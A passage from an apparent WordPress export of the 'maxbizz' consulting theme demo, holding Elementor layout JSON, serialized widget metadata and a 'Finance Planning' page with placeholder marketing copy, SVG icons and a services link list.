It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"16b4e3e","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3893a38","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"29df260","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"348e8e4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b035bd5","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"93ca462","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"899f255","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"72fb2ed","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"ccc4166","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home4.png","id":2074},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"31ae611","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"4d5a916","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #55bb53;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"bdf1c78","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4a42617","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"d6f9d84","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"1eca910","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"ece40a4","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"e3aefa2","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"18deaa2","elType":"widget","settings":{"text":"Divider","color":"#55BB53","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"f3267e7","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#55BB53","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"adb2e77","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"64a2dd8","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"87b1729","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"f10f882","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9647d28","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"89800c0","elType":"widget","settings":{"text":"Divider","color":"#55BB53","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"a10b197","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"1f4fc86","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"7074fb9","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"cea57b4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home4.jpg","id":2076},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a5e3bbe","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"background_background":"classic","padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"4cccae2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"46dfe95","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#55BB53","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"61c56ad","elType":"column","settings":{"_column_size":50,"_inline_size":18,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"78e7dab","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Full_White.svg","id":1956},"image_size":"full","align":"left","width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"2c9cdc6","elType":"column","settings":{"_column_size":50,"_inline_size":82,"_inline_size_tablet":100},"elements":[{"id":"b254a5c","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:4;s:10:"image_size";i:4;s:5:"align";i:2;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:5;s:11:"header_size";i:5;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;s:22:"typography_font_weight";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:7;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:4;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:2;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:4;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[300]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Finance Planning</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/finance-planning/</link>
		<pubDate>Tue, 22 Sep 2020 02:55:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=1002</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box6-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box6-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h4>How It Works &amp; How We Do It</h4>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h4>Business Planning &amp; Strategy</h4>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home4-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h5>Services</h5>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
